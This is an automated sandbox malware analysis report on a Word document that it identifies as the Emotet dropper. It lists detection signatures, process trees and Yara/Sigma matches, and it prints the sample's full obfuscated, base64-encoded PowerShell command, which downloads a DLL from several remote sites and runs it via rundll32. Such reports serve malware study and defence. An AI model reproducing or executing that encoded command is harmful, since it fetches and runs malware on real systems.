Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report pack-91089 416755919.doc

Overview

General Information

Sample Name:pack-91089 416755919.doc
Analysis ID:336489
MD5:1dc95341c113473f3ac71d3fccdc3512
SHA1:d07202389ee1458cd8d3f8f000701bc537ec6797
SHA256:700f121e98f06604e45498c6313d741f4c43582fa41e1cdda3ae1b0e17e1e62c

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 684 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 1276 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2556 cmdline: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2332 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2824 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2712 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2488 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2856 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2408 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000C.00000002.2117427965.00000000006C1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000C.00000002.2115320504.0000000000200000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000008.00000002.2108163281.00000000001C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000007.00000002.2106729405.00000000001D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.rundll32.exe.1b0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              10.2.rundll32.exe.270000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                11.2.rundll32.exe.180000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.1e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    7.2.rundll32.exe.230000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0A